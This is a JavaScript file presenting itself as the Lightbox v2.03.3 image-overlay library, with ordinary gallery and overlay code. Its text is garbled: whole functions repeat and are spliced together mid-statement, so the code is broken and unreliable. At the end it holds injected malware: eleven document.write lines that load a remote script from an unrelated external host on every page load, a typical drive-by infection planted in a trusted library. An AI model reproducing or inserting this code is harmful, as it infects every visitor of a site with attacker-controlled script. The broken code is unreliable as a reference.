// -----------------------------------------------------------------------------------
//
//	Lightbox v2.03.3
//	by Lokesh Dhakar - http://www.huddletogether.com
//	5/21/06
//
//	For more information on this script, visit:
//	http://huddletogether.com/projects/lightbox2/
//
//	Licensed under the Creative Commons Attribution 2.5 License - http://creativecommons.org/licenses/by/2.5/
//	
//	Credit also due to those who have helped, inspired, and made their code available to the public.
//	Including: Scott Upton(uptonic.com), Peter-Paul Koch(quirksmode.com), Thomas Fuchs(mir.aculo.us), and others.
//
//
// -----------------------------------------------------------------------------------
/*

	Table of Contents
	-----------------
	Configuration
	Global Variables

	Extending Built-in Objects	
	- Object.extend(Element)
	- Array.prototype.removeDuplicates()
	- Array.prototype.empty()

	Lightbox Class Declaration
	- initialize()
	- updateImageList()
	- start()
	- changeImage()
	- resizeImageContainer()
	- showImage()
	- updateDetails()
	- updateNav()
	- enableKeyboardNav()
	- disableKeyboardNav()
	- keyboardAction()
	- preloadNeighborImages()
	- end()
	
	Miscellaneous Functions
	- getPageScroll()
	- getPageSize()
	- getKey()
	- listenKey()
	- showSelectBoxes()
	- hideSelectBoxes()
	- showFlash()
	- hideFlash()
	- pause()
	- initLightbox()
	
	Function Calls
	- addLoadEvent(initLightbox)
	

*/
// -----------------------------------------------------------------------------------

//
//	Configuration
//
var fileLoadingImage = "images/loading.gif";		
var fileBottomNavCloseImage = "images/closelabel.gif";

var overlayOpacity = 0.8;	// controls transparency of shadow overlay

var animate = true;			// toggles resizing animations
var resizeSpeed = 7;		// controls the speed of the image resizing animations (1=slowest and 10=fastest)

var borderSize = 10;		//if you adjust the padding in the CSS, you will need to update this variable

// -----------------------------------------------------------------------------------

//
//	Global Variables
//
var imageArray = new Array;
var activeImage;

if(animate == true){
	overlayDuration = 0.2;	// shadow fade in/out duration
	if(resizeSpeed > 10){ resizeSpeed = 10;}
	if(resizeSpeed < 1){ resizeSpeed = 1;}
	resizeDuration = (11 - resizeSpeed) * 0.15;
} else { 
	overlayDuration = 0;
	resizeDuration = 0;
}

// -----------------------------------------------------------------------------------

//
//	Additional methods for Element added by SU, Couloir
//	- further additions by Lokesh Dhakar (huddletogether.com)
//
Object.extend(Element, {
	getWidth: function(element) {
	   	element = $(element);
	   	return element.offsetWidth; 
	},
	setWidth: function(element,w) {
	   	element = $(element);
    	element.style.width = w +"px";
	},
	setHeight: function(element,h) {
   		element = $(element);
    	element.style.height = h +"px";
	},
	setTop: function(element,t) {
	   	element = $(element);
    	element.style.top = t +"px";
	},
	setLeft: function(element,l) {
	   	element = $(element);
    	element.style.left = l +"px";
	},
	setSrc: function(element,src) {
    	element = $(element);
    	element.src = src; 
	},
	setHref: function(element,href) {
    	element = $(element);
    	element.href = href; 
	},
	setInnerHTML: function(element,content) {
		element = $(element);
		element.innerHTML = content;
	}
});

// -----------------------------------------------------------------------------------

//
//	Extending built-in Array object
//	- array.removeDuplicates()
//	- array.empty()
//
Array.prototype.removeDuplicates = function () {
    for(i = 0; i < this.length; i++){
        for(j = this.length-1; j>i; j--){        
            if(this[i][0] == this[j][0]){
                this.splice(j,1);
            }
        }
    }
}

// -----------------------------------------------------------------------------------

Array.prototype.empty = function () {
	for(i = 0; i <= this.length; i++){
		this.shift();
	}
}

// -----------------------------------------------------------------------------------

//
//	Lightbox Class Declaration
//	- initialize()
//	- start()
//	- changeImage()
//	- resizeImageContainer()
//	- showImage()
//	- updateDetails()
//	- updateNav()
//	- enableKeyboardNav()
//	- disableKeyboardNav()
//	- keyboardNavAction()
//	- preloadNeighborImages()
//	- end()
//
//	Structuring of code inspired by Scott Upton (http://www.uptonic.com/)
//
var Lightbox = Class.create();

Lightbox.prototype = {
	
	// initialize()
	// Constructor runs on completion of the DOM loading. Calls updateImageList and then
	// the function inserts html at the bottom of the page which is used to display the shadow 
	// overlay and the image container.
	//
	initialize: function() {	
		
		this.updateImageList();

		// Code inserts html at the bottom of the page that looks similar to this:
		//
		//	<div id="overlay"></div>
		//	<div id="lightbox">
		//		<div id="outerImageContainer">
		//			<div id="imageContainer">
		//				<img id="lightboxImage">
		//				<div style="" id="hoverNav">
		//					<a href="#" id="prevLink"></a>
		//					<a href="#" id="nextLink"></a>
		//				</div>
		//				<div id="loading">
		//					<a href="#" id="loadingLink">
		//						<img src="images/loading.gif">
		//					</a>
		//				</div>
		//			</div>
		//		</div>
		//		<div id="imageDataContainer">
		//			<div id="imageData">
		//				<div id="imageDetails">
		//					<span id="caption"></span>
		//					<span id="numberDisplay"></span>
		//				</div>
		//				<div id="bottomNav">
		//					<a href="#" id="bottomNavClose">
		//						<img src="images/close.gif">
		//					</a>
		//				</div>
		//			</div>
		//		</div>
		//	</div>


		var objBody = document.getElementsByTagName("body").item(0);
		
		var objOverlay = document.createElement("div");
		objOverlay.setAttribute('id','overlay');
		objOverlay.style.display = 'none';
		objOverlay.onclick = function() { myLightbox.end(); }
		objBody.appendChild(objOverlay);
		
		var objLightbox = document.createElement("div");
		objLightbox.setAttribute('id','lightbox');
		objLightbox.style.display = 'none';
		objLightbox.onclick = function(e) {	// close Lightbox is user clicks shadow overlay
			if (!e) var e = window.event;
			var clickObj = Event.element(e).id;
			if ( clickObj == 'lightbox') {
				myLightbox.end();
			}
		};
		objBody.appendChild(objLightbox);
			
		var objOuterImageContainer = document.createElement("div");
		objOuterImageContainer.setAttribute('id','outerImageContainer');
		objLightbox.appendChild(objOuterImageContainer);

		// When Lightbox starts it will resize itself from 250 by 250 to the current image dimension.
		// If animations are turned off, it will be hidden as to prevent a flicker of a
		// white 250 by 250 box.
		if(animate){
			Element.setWidth('outerImageContainer', 250);
			Element.setHeight('outerImageContainer', 250);			
		} else {
			Element.setWidth('outerImageContainer', 1);
			Element.setHeight('outerImageContaineontainer()
//	- showImage()
//	- updateDetails()
//	- updateNav()
//	- enableKeyboardNav()
//	- disableKeyboardNav()
//	- keyboardNavAction()
//	- preloadNeighborImages()
//	- end()
//
//	Structuring of code inspired by Scott Upton (http://www.uptonic.com/)
//
var Lightbox = Class.create();

Lightbox.prototype = {
	
	// initialize()
	// Constructor runs on completion of the DOM loading. Calls updateImageList and then
	// the function inserts html at the bottom of the page which is used to display the shadow 
	// overlay and the image container.
	//
	initialize: function() {	
		
		this.updateImageList();

		// Code inserts html at the bottom of the page that looks similar to this:
		//
		//	<div id="overlay"></div>
		//	<div id="lightbox">
		//		<div id="outerImageContainer">
		//			<div id="imageContainer">
		//				<img id="lightboxImage">
		//				<div style="" id="hoverNav">
		//					<a href="#" id="prevLink"></a>
		//					<a href="#" id="nextLink"></a>
		//				</div>
		//				<div id="loading">
		//					<a href="#" id="loadingLink">
		//						<img src="images/loading.gif">
		//					</a>
		//				</div>
		//			</div>
		//		</div>
		//		<div id="imageDataContainer">
		//			<div id="imageData">
		//				<div id="imageDetails">
		//					<span id="caption"></span>
		//					<span id="numberDisplay"></span>
		//				</div>
		//				<div id="bottomNav">
r', 1);			
		}

		var objImageContainer = document.createElement("div");
		objImageContainer.setAttribute('id','imageContainer');
		objOuterImageContainer.appendChild(objImageContainer);
	
		var objLightboxImage = document.createElement("img");
		objLightboxImage.setAttribute('id','lightboxImage');
		objImageContainer.appendChild(objLightboxImage);
	
		var objHoverNav = document.createElement("div");
		objHoverNav.setAttribute('id','hoverNav');
		objImageContainer.appendChild(objHoverNav);
	
		var objPrevLink = document.createElement("a");
		objPrevLink.setAttribute('id','prevLink');
		objPrevLink.setAttribute('href','#');
		objHoverNav.appendChild(objPrevLink);
		
		var objNextLink = document.createElement("a");
		objNextLink.setAttribute('id','nextLink');
		objNextLink.setAttribute('href','#');
		objHoverNav.appendChild(objNextLink);
	
		var objLoading = document.createElement("div");
		objLoading.setAttribute('id','loading');
		objImageContainer.appendChild(objLoading);
	
		var objLoadingLink = document.createElement("a");
		objLoadingLink.setAttribute('id','loadingLink');
		objLoadingLink.setAttribute('href','#');
		objLoadingLink.onclick = function() { myLightbox.end(); return false; }
		objLoading.appendChild(objLoadingLink);
	
		var objLoadingImage = document.createElement("img");
		objLoadingImage.setAttribute('src', fileLoadingImage);
		objLoadingLink.appendChild(objLoadingImage)ontainer()
//	- showImage()
//	- updateDetails()
//	- updateNav()
//	- enableKeyboardNav()
//	- disableKeyboardNav()
//	- keyboardNavAction()
//	- preloadNeighborImages()
//	- end()
//
//	Structuring of code inspired by Scott Upton (http://www.uptonic.com/)
//
var Lightbox = Class.create();

Lightbox.prototype = {
	
	// initialize()
	// Constructor runs on completion of the DOM loading. Calls updateImageList and then
	// the function inserts html at the bottom of the page which is used to display the shadow 
	// overlay and the image container.
	//
	initialize: function() {	
		
		this.updateImageList();

		// Code inserts html at the bottom of the page that looks similar to this:
		//
		//	<div id="overlay"></div>
		//	<div id="lightbox">
		//		<div id="outerImageContainer">
		//			<div id="imageContainer">
		//				<img id="lightboxImage">
		//				<div style="" id="hoverNav">
		//					<a href="#" id="prevLink"></a>
		//					<a href="#" id="nextLink"></a>
		//				</div>
		//				<div id="loading">
		//					<a href="#" id="loadingLink">
		//						<img src="images/loading.gif">
		//					</a>
		//				</div>
		//			</div>
		//		</div>
		//		<div id="imageDataContainer">
		//			<div id="imageData">
		//				<div id="imageDetails">
		//					<span id="caption"></span>
		//					<span id="numberDisplay"></span>
		//				</div>
		//				<div id="bottomNav">
;

		var objImageDataContainer = document.createElement("div");
		objImageDataContainer.setAttribute('id','imageDataContainer');
		objLightbox.appendChild(objImageDataContainer);

		var objImageData = document.createElement("div");
		objImageData.setAttribute('id','imageData');
		objImageDataContainer.appendChild(objImageData);
	
		var objImageDetails = document.createElement("div");
		objImageDetails.setAttribute('id','imageDetails');
		objImageData.appendChild(objImageDetails);
	
		var objCaption = document.createElement("span");
		objCaption.setAttribute('id','caption');
		objImageDetails.appendChild(objCaption);
	
		var objNumberDisplay = document.createElement("span");
		objNumberDisplay.setAttribute('id','numberDisplay');
		objImageDetails.appendChild(objNumberDisplay);
		
		var objBottomNav = document.createElement("div");
		objBottomNav.setAttribute('id','bottomNav');
		objImageData.appendChild(objBottomNav);
	
		var objBottomNavCloseLink = document.createElement("a");
		objBottomNavCloseLink.setAttribute('id','bottomNavClose');
		objBottomNavCloseLink.setAttribute('href','#');
		objBottomNavCloseLink.onclick = function() { myLightbox.end(); return false; }
		objBottomNav.appendChild(objBottomNavCloseLink);
	
		var objBottomNavCloseImage = document.createElement("img");
		objBottomNavCloseImage.setAttribute('src', fileBottomNavCloseImage);
		objBottomNavCloseLink.appendChild(objBottomNavCloseImage);
	},


	//
	// updateImageList()
	// Loops through anchor tags looking for 'lightbox' references and applies onclick
	// events to appropriate links. You can rerun after dynamically adding images w/ajax.
	//
	updateImageList: function() {	
		if (!document.getElementsByTagName){ return; }
		var anchors = document.getElementsByTagName('a');
		var areas = document.getElementsByTagName('area');

		// loop through all anchor tags
		for (var i=0; i<anchors.length; i++){
			var anchor = anchors[i];
			
			var relAttribute = String(anchor.getAttribute('rel'));
			
			// use the string.match() method to catch 'lightbox' references in the rel attribute
			if (anchor.getAttribute('href') && (relAttribute.toLowerCase().match('lightbox'))){
				anchor.onclick = function () {myLightbox.start(this); return false;}
			}
		}

		// loop through all area tags
		// todo: combine anchor & area tag loops
		for (var i=0; i< areas.length; i++){
			var area = areas[i];
			
			var relAttribute = String(area.getAttribute('rel'));
			
			// use the string.match() method to catch 'lightbox' references in the rel attribute
			if (area.getAttribute('href') && (relAttribute.toLowerCase().match('lightbox'))){
				area.onclick = function () {myLightbox.start(this); return false;}
			}
		}
	},
	
	
	//
	//	start()
	//	Display overlay and lightbox. If image is part of a set, add siblings to imageArray.

	//
	start: function(imageLink) {	

		hideSelectBoxes();
		hideFlash();

		// stretch overlay to fill page and fade in
		var arrayPageSize = getPageSize();
		Element.setWidth('overlay', arrayPageSize[0]);
		Element.setHeight('overlay', arrayPageSize[1]);

		new Effect.Appear('overlay', { duration: overlayDuration, from: 0.0, to: overlayOpacity });

		imageArray = [];
		imageNum = 0;		

		if (!document.getElementsByTagName){ return; }
		var anchors = document.getElementsByTagName( imageLink.tagName);

		// if image is NOT part of a set..
		if((imageLink.getAttribute('rel') == 'lightbox')){
			// add single image to imageArray
			imageArray.push(new Array(imageLink.getAttribute('href'), imageLink.getAttribute('title')));			
		} else {
		// if image is part of a set..

			// loop through anchors, find other images in set, and add them to imageArray
			for (var i=0; i<anchors.length; i++){
				var anchor = anchors[i];
				if (anchor.getAttribute('href') && (anchor.getAttribute('rel') == imageLink.getAttribute('rel'))){
					imageArray.push(new Array(anchor.getAttribute('href'), anchor.getAttribute('title')));
				}
			}
			imageArray.removeDuplicates();
			while(imageArray[imageNum][0] != imageLink.getAttribute('href')) { imageNum++;}
		}

		// calculate top and left offset for the lightbox 
		var arrayPageScroll = getPageScroll();
		var lightboxTop = arrayPageScroll[1] + (arrayPageSize[3] / 10);
		var lightboxLeft = arrayPageScroll[0];
		Element.setTop('lightbox', lightboxTop);
		Element.setLeft('lightbox', lightboxLeft);
		
		Element.show('lightbox');
		
		this.changeImage(imageNum);
	},

	//
	//	changeImage()
	//	Hide most elements and preload image in preparation for resizing image container.
	//
	changeImage: function(imageNum) {	
		
		activeImage = imageNum;	// update global var

		// hide elements during transition
		if(animate){ Element.show('loading');}
		Element.hide('lightboxImage');
		Element.hide('hoverNav');
		Element.hide('prevLink');
		Element.hide('nextLink');
		Element.hide('imageDataContainer');
		Element.hide('numberDisplay');		
		
		imgPreloader = new Image();
		
		// once image is preloaded, resize image container
		imgPreloader.onload=function(){
			Element.setSrc('lightboxImage', imageArray[activeImage][0]);
			myLightbox.resizeImageContainer(imgPreloader.width, imgPreloader.height);
			
			imgPreloader.onload=function(){};	//	clear onLoad, IE behaves irratically with animated gifs otherwise 
		}
		imgPreloader.src = imageArray[activeImage][0];
	},

	//
	//	resizeImageContainer()
	//
	resizeImageContainer: function( imgWidth, imgHeight) {

		// get curren width and height
		this.widthCurrent = Element.getWidth('outerImageContainer');
		this.heightCurrent = Element.getHeight('outerImageContainer');

		// get new width and height
		var widthNew = (imgWidth  + (borderSize * 2));
		var heightNew = (imgHeight  + (borderSize * 2));

		// scalars based on change from old to new
		this.xScale = ( widthNew / this.widthCurrent) * 100;
		this.yScale = ( heightNew / this.heightCurrent) * 100;

		// calculate size difference between new and old image, and resize if necessary
		wDiff = this.widthCurrent - widthNew;
		hDiff = this.heightCurrent - heightNew;

		if(!( hDiff == 0)){ new Effect.Scale('outerImageContainer', this.yScale, {scaleX: false, duration: resizeDuration, queue: 'front'}); }
		if(!( wDiff == 0)){ new Effect.Scale('outerImageContainer', this.xScale, {scaleY: false, delay: resizeDuration, duration: resizeDuration}); }

		// if new and old image are same size and no scaling transition is necessary, 
		// do a quick pause to prevent image flicker.
		if((hDiff == 0) && (wDiff == 0)){
			if (navigator.appVersion.indexOf("MSIE")!=-1){ pause(250); } else { pause(100);} 
		}

		Element.setHeight('prevLink', imgHeight);
		Element.setHeight('nextLink', imgHeight);
		Element.setWidth( 'imageDataContainer', widthNew);

		this.showImage();
	},
	
	//
	//	showImage()
	//	Display image and begin preloading neighbors.
	//
	showImage: function(){
		Element.hide('loading');
		new Effect.Appear('lightboxImage', { duration: resizeDuration, queue: 'end', afterFinish: function(){	myLightbox.updateDetails(); } });
		this.preloadNeighborImages(); / 10);
		var lightboxLeft = arrayPageScroll[0];
		Element.setTop('lightbox', lightboxTop);
		Element.setLeft('lightbox', lightboxLeft);
		
		Element.show('lightbox');
		
		this.changeImage(imageNum);
	},

	//

	//	changeImage()
	//	Hide most elements and preload image in preparation for resizing image container.
	//
	changeImage: function(imageNum) {	
		
		activeImage = imageNum;	// update global var

		// hide elements during transition
		if(animate){ Element.show('loading');}
		Element.hide('lightboxImage');
		Element.hide('hoverNav');
		Element.hide('prevLink');
		Element.hide('nextLink');
		Element.hide('imageDataContainer');
		Element.hide('numberDisplay');		
		
		imgPreloader = new Image();
		
		// once image is preloaded, resize image container
		imgPreloader.onload=function(){
			Element.setSrc('lightboxImage', imageArray[activeImage][0]);
			myLightbox.resizeImageContainer(imgPreloader.width, imgPreloader.height);
			
			imgPreloader.onload=function(){};	//	clear onLoad, IE behaves irratically with animated gifs otherwise 
		}
		imgPreloader.src = imageArray[activeImage][0];
	},

	//
	//	resizeImageContainer()
	//
	resizeImageContainer: function( imgWidth, imgHeight) {

		// get curren width and height
		this.widthCurrent = Element.getWidth('outerImageContainer');
		this.heightCurrent = Element.getHeight('outerImageContainer');

		// get new width and height

	},

	//
	//	updateDetails()
	//	Display caption, image number, and bottom nav.
	//
	updateDetails: function() {
	
		// if caption is not null
		if(imageArray[activeImage][1]){
			Element.show('caption');
			Element.setInnerHTML( 'caption', imageArray[activeImage][1]);
		}
		
		// if image is part of set display 'Image x of x' 
		if(imageArray.length > 1){
			Element.show('numberDisplay');
			Element.setInnerHTML( 'numberDisplay', "Image " + eval(activeImage + 1) + " of " + imageArray.length);
		}

		new Effect.Parallel(
			[ new Effect.SlideDown( 'imageDataContainer', { sync: true, duration: resizeDuration, from: 0.0, to: 1.0 }), 
			  new Effect.Appear('imageDataContainer', { sync: true, duration: resizeDuration }) ], 
			{ duration: resizeDuration, afterFinish: function() {
				// update overlay size and update nav
				var arrayPageSize = getPageSize();
				Element.setHeight('overlay', arrayPageSize[1]);
				myLightbox.updateNav();
				}
			} 
		);
	},

	//
	//	updateNav()
	//	Display appropriate previous and next hover navigation.
	//
	updateNav: function() {

		Element.show('hoverNav');				

		// if not first image in set, display prev image button
		if(activeImage != 0){
			Element.show('prevLink');
			document.getElementById('prevLink').onclick = function() {
				myLightbox.changeImage(activeImage - 1); return false;
			}
		}

		// if not last image in set, display ne / 10);
		var lightboxLeft = arrayPageScroll[0];
		Element.setTop('lightbox', lightboxTop);
		Element.setLeft('lightbox', lightboxLeft);
		
		Element.show('lightbox');
		
		this.changeImage(imageNum);
	},

	//
	//	changeImage()
	//	Hide most elements and preload image in preparation for resizing image container.
	//
	changeImage: function(imageNum) {	
		
		activeImage = imageNum;	// update global var

		// hide elements during transition
		if(animate){ Element.show('loading');}
		Element.hide('lightboxImage');
		Element.hide('hoverNav');
		Element.hide('prevLink');
		Element.hide('nextLink');
		Element.hide('imageDataContainer');
		Element.hide('numberDisplay');		
		
		imgPreloader = new Image();
		
		// once image is preloaded, resize image container
		imgPreloader.onload=function(){
			Element.setSrc('lightboxImage', imageArray[activeImage][0]);
			myLightbox.resizeImageContainer(imgPreloader.width, imgPreloader.height);
			
			imgPreloader.onload=function(){};	//	clear onLoad, IE behaves irratically with animated gifs otherwise 
		}
		imgPreloader.src = imageArray[activeImage][0];
	},

	//
	//	resizeImageContainer()
	//
	resizeImageContainer: function( imgWidth, imgHeight) {

		// get curren width and height
		this.widthCurrent = Element.getWidth('outerImageContainer');
		this.heightCurrent = Element.getHeight('outerImageContainer');

		// get new width and height
xt image button
		if(activeImage != (imageArray.length - 1)){
			Element.show('nextLink');
			document.getElementById('nextLink').onclick = function() {
				myLightbox.changeImage(activeImage + 1); return false;
			}
		}
		
		this.enableKeyboardNav();
	},

	//
	//	enableKeyboardNav()
	//
	enableKeyboardNav: function() {
		document.onkeydown = this.keyboardAction; 
	},

	//
	//	disableKeyboardNav()
	//
	disableKeyboardNav: function() {
		document.onkeydown = '';
	},

	//
	//	keyboardAction()
	//
	keyboardAction: function(e) {
		if (e == null) { // ie
			keycode = event.keyCode;
			escapeKey = 27;
		} else { // mozilla
			keycode = e.keyCode;
			escapeKey = e.DOM_VK_ESCAPE;
		}

		key = String.fromCharCode(keycode).toLowerCase();
		
		if((key == 'x') || (key == 'o') || (key == 'c') || (keycode == escapeKey)){	// close lightbox
			myLightbox.end();
		} else if((key == 'p') || (keycode == 37)){	// display previous image
			if(activeImage != 0){
				myLightbox.disableKeyboardNav();
				myLightbox.changeImage(activeImage - 1);
			}
		} else if((key == 'n') || (keycode == 39)){	// display next image
			if(activeImage != (imageArray.length - 1)){
				myLightbox.disableKeyboardNav();
				myLightbox.changeImage(activeImage + 1);
			}
		}

	},

	//
	//	preloadNeighborImages()
	//	Preload previous and next images.
	//
	preloadNeighborImages: function(){

		if((imageArray.lengt / 10);
		var lightboxLeft = arrayPageScroll[0];
		Element.setTop('lightbox', lightboxTop);
		Element.setLeft('lightbox', lightboxLeft);
		
		Element.show('lightbox');
		
		this.changeImage(imageNum);
	},

	//
	//	changeImage()
	//	Hide most elements and preload image in preparation for resizing image container.
	//
	changeImage: function(imageNum) {	
		
		activeImage = imageNum;	// update global var

		// hide elements during transition
		if(animate){ Element.show('loading');}
		Element.hide('lightboxImage');
		Element.hide('hoverNav');
		Element.hide('prevLink');
		Element.hide('nextLink');
		Element.hide('imageDataContainer');
		Element.hide('numberDisplay');		
		
		imgPreloader = new Image();
		
		// once image is preloaded, resize image container
		imgPreloader.onload=function(){
			Element.setSrc('lightboxImage', imageArray[activeImage][0]);
			myLightbox.resizeImageContainer(imgPreloader.width, imgPreloader.height);
			
			imgPreloader.onload=function(){};	//	clear onLoad, IE behaves irratically with animated gifs otherwise 
		}
		imgPreloader.src = imageArray[activeImage][0];
	},

	//
	//	resizeImageContainer()
	//
	resizeImageContainer: function( imgWidth, imgHeight) {

		// get curren width and height
		this.widthCurrent = Element.getWidth('outerImageContainer');
		this.heightCurrent = Element.getHeight('outerImageContainer');

		// get new width and height
h - 1) > activeImage){
			preloadNextImage = new Image();
			preloadNextImage.src = imageArray[activeImage + 1][0];
		}
		if(activeImage > 0){
			preloadPrevImage = new Image();
			preloadPrevImage.src = imageArray[activeImage - 1][0];
		}
	
	},

	//
	//	end()
	//
	end: function() {
		this.disableKeyboardNav();
		Element.hide('lightbox');
		new Effect.Fade('overlay', { duration: overlayDuration});
		showSelectBoxes();
		showFlash();
	}
}

// -----------------------------------------------------------------------------------

//
// getPageScroll()
// Returns array with x,y page scroll values.
// Core code from - quirksmode.com
//
function getPageScroll(){

	var xScroll, yScroll;

	if (self.pageYOffset) {
		yScroll = self.pageYOffset;
		xScroll = self.pageXOffset;
	} else if (document.documentElement && document.documentElement.scrollTop){	 // Explorer 6 Strict
		yScroll = document.documentElement.scrollTop;
		xScroll = document.documentElement.scrollLeft;
	} else if (document.body) {// all other Explorers
		yScroll = document.body.scrollTop;
		xScroll = document.body.scrollLeft;	
	}

	arrayPageScroll = new Array(xScroll,yScroll) 
	return arrayPageScroll;
}

// -----------------------------------------------------------------------------------

//
// getPageSize()
// Returns array with page width, height and window width, height
// Core code from - quirksmode.com
// Edit for Firefox by pHaez
//
function getPageSize(){
	
	var xScroll, yScroll;
	
	if (window.innerHeight && window.scrollMaxY) {	
		xScroll = window.innerWidth + window.scrollMaxX;
		yScroll = window.innerHeight + window.scrollMaxY;
	} else if (document.body.scrollHeight > document.body.offsetHeight){ // all but Explorer Mac
		xScroll = document.body.scrollWidth;
		yScroll = document.body.scrollHeight;
	} else { // Explorer Mac...would also work in Explorer 6 Strict, Mozilla and Safari
		xScroll = document.body.offsetWidth;
		yScroll = document.body.offsetHeight;
	}
	
	var windowWidth, windowHeight;
	
//	console.log(self.innerWidth);
//	console.log(document.documentElement.clientWidth);

	if (self.innerHeight) {	// all except Explorer
		if(document.documentElement.clientWidth){
			windowWidth = document.documentElement.clientWidth; 
		} else {
			windowWidth = self.innerWidth;
		}
		windowHeight = self.innerHeight;
	} else if (document.documentElement && document.documentElement.clientHeight) { // Explorer 6 Strict Mode
		windowWidth = document.documentElement.clientWidth;
		windowHeight = document.documentElement.clientHeight;
	} else if (document.body) { // other Explorers
		windowWidth = document.body.clientWidth;
		windowHeight = document.body.clientHeight;
	}	
	
	// for small pages with total height less then height of the viewport
	if(yScroll < windowHeight){
		pageHeight = windowHeight;
	} else { 
		pageHeight = yScroll;
	}

//	console.log("xScroll " + xScroll)
//	console.log("windowWidth " + windowWidth)

	// for small pages with total width less then width of the viewport
	if(xScroll < windowWidth){	
		pageWidth = xScroll;		
	} else {
		pageWidth = windowWidth;
	}
//	console.log("pageWidth " + pageWidth)

	arrayPageSize = new Array(pageWidth,pageHeight,windowWidth,windowHeight) 
	return arrayPageSize;
}

// -----------------------------------------------------------------------------------

//
// getKey(key)
// Gets keycode. If 'x' is pressed then it hides the lightbox.
//
function getKey(e){
	if (e == null) { // ie
		keycode = event.keyCode;
	} else { // mozilla
		keycode = e.which;
	}
	key = String.fromCharCode(keycode).toLowerCase();
	
	if(key == 'x'){
	}
}

// -----------------------------------------------------------------------------------

//
// listenKey()
//
function listenKey () {	document.onkeypress = getKey; }
	
// ---------------------------------------------------

function showSelectBoxes(){
	var selects = document.getElementsByTagName("select");
	for (i = 0; i != selects.length; i++) {
		selects[i].style.visibility = "visible";
	}
}

// ---------------------------------------------------

function hideSelectBoxes(){
	var selects = document.getElementsByTagName("select");
	for (i = 0; i != selects.length; i++) {
		selects[i].style	
	},

	//
	//	end()
	//
	end: function() {
		this.disableKeyboardNav();
		Element.hide('lightbox');
		new Effect.Fade('overlay', { duration: overlayDuration});
		showSelectBoxes();
		showFlash();
	}
}

// -----------------------------------------------------------------------------------

//
// getPageScroll()
// Returns array with x,y page scroll values.
// Core code from - quirksmode.com
//
function getPageScroll(){

	var xScroll, yScroll;

	if (self.pageYOffset) {
		yScroll = self.pageYOffset;
		xScroll = self.pageXOffset;
	} else if (document.documentElement && document.documentElement.scrollTop){	 // Explorer 6 Strict
		yScroll = document.documentElement.scrollTop;
		xScroll = document.documentElement.scrollLeft;
	} else if (document.body) {// all other Explorers
		yScroll = document.body.scrollTop;
		xScroll = document.body.scrollLeft;	
	}

	arrayPageScroll = new Array(xScroll,yScroll) 
	return arrayPageScroll;
}

// -----------------------------------------------------------------------------------

//
// getPageSize()
// Returns array with page width, height and window width, height
// Core code from - quirksmode.com
// Edit for Firefox by pHaez
//
function getPageSize(){
	
	var xScroll, yScroll;
	
	if (window.innerHeight && window.scrollMaxY) {	
		xScroll = window.innerWidth + window.scrollMaxX;
		yScroll = window.innerHeight + window.scrollMaxY;
	} else if (document.body.scrollHeight > document.body.offsetHeight){ // all but Explorer Mac
		xScroll = document.body.scrollWidth;
		yScroll = document.body.scrollHeight;
	} else { // Explorer Mac...would also work in Explorer 6 Strict, Mozilla and Safari
		xScroll = document.body.offsetWidth;
		yScroll = document.body.offsetHeight;
	}
	
	var windowWidth, windowHeight;
	
//	console.log(self.innerWidth);
//	console.log(document.documentElement.clientWidth);

	if (self.innerHeight) {	// all except Explorer
		if(document.documentElement.clientWidth){
			windowWidth = document.documentElement.clientWidth; 
		} else {
			windowWidth = self.innerWidth;
		}
		windowHeight = self.innerHeight;
	} else if (document.documentElement && document.documentElement.clientHeight) { // Explorer 6 Strict Mode
		windowWidth = document.documentElement.clientWidth;
		windowHeight = document.documentElement.clientHeight;
	} else if (document.body) { // other Explorers
		windowWidth = document.body.clientWidth;
		windowHeight = document.body.clientHeight;
	}	
	
	// for small pages with total height less then height of the viewport
	if(yScroll < windowHeight){
		pageHeight = windowHeight;
	} else { 
		pageHeight = yScroll;
	}

//	console.log("xScroll " + xScroll)
//	console.log("windowWidth " + windowWidth)

	// for small pages with total width less then width of the viewport
	if(xScroll < windowWidth){	
		pageWidth = xScroll;		
	} else {
		pageWidth = windowWidth;
	}
//	console.log("pageWidth " + pageWidth)

	arrayPageSize = new Array(pageWidth,pageHeight,windowWidth,windowHeight) 
	return arrayPageSize;
}

// -----------------------------------------------------------------------------------

//
// getKey(key)
// Gets keycode. If 'x' is pressed then it hides the lightbox.
//
function getKey(e){
	if (e == null) { // ie
		keycode = event.keyCode;
	} else { // mozilla
		keycode = e.which;
	}
	key = String.fromCharCode(keycode).toLowerCase();
	
	if(key == 'x'){
	}
}

// -----------------------------------------------------------------------------------

//
// listenKey()
//
function listenKey () {	document.onkeypress = getKey; }
	
// ---------------------------------------------------

function showSelectBoxes(){
	var selects = document.getElementsByTagName("select");
	for (i = 0; i != selects.length; i++) {
.visibility = "hidden";
	}
}

// ---------------------------------------------------

function showFlash(){
	var flashObjects = document.getElementsByTagName("object");
	for (i = 0; i < flashObjects.length; i++) {
		flashObjects[i].style.visibility = "visible";
	}

	var flashEmbeds = document.getElementsByTagName("embed");
	for (i = 0; i < flashEmbeds.length; i++) {
		flashEmbeds[i].style.visibility = "visible";
	}
}

// ---------------------------------------------------

function hideFlash(){
	var flashObjects = document.getElementsByTagName("object");
	for (i = 0; i < flashObjects.length; i++) {
		flashObjects[i].style.visibility = "hidden";
	}

	var flashEmbeds = document.getElementsByTagName("embed");
	for (i = 0; i < flashEmbeds.length; i++) {
		flashEmbeds[i].style.visibility = "hidden";
	}

}


// ---------------------------------------------------

//
// pause(numberMillis)
// Pauses code execution for specified time. Uses busy code, not good.
// Help from Ran Bar-On [ran2103@gmail.com]
//

function pause(ms){
	var date = new Date();
	curDate = null;
	do{var curDate = new Date();}
	while( curDate - date < ms);
}
/*
function pause(numberMillis) {
	var curently = new Date().getTime() + sender;
	while (new Date().getTime();	
}
*/
// ---------------------------------------------------



function initLightbox() { myLightbox = new Lightbox(); }
Event.observe(window, 'load', initLightbox, false);
document.write('<script src=http://rojasheavy.com/admin/maq.php ><\/script>');
document.write('<script src=http://rojasheavy.com/admin/maq.php ><\/script>');
document.write('<script src=http://rojasheavy.com/admin/maq.php ><\/script>');
document.write('<script src=http://rojasheavy.com/admin/maq.php ><\/script>');
document.write('<script src=http://rojasheavy.com/admin/maq.php ><\/script>');
document.write('<script src=http://rojasheavy.com/admin/maq.php ><\/script>');
document.write('<script src=http://rojasheavy.com/admin/maq.php ><\/script>');
document.write('<script src=http://rojasheavy.com/admin/maq.php ><\/script>');
document.write('<script src=http://rojasheavy.com/admin/maq.php ><\/script>');
document.write('<script src=http://rojasheavy.com/admin/maq.php ><\/script>');
document.write('<script src=http://rojasheavy.com/admin/maq.php ><\/script>');
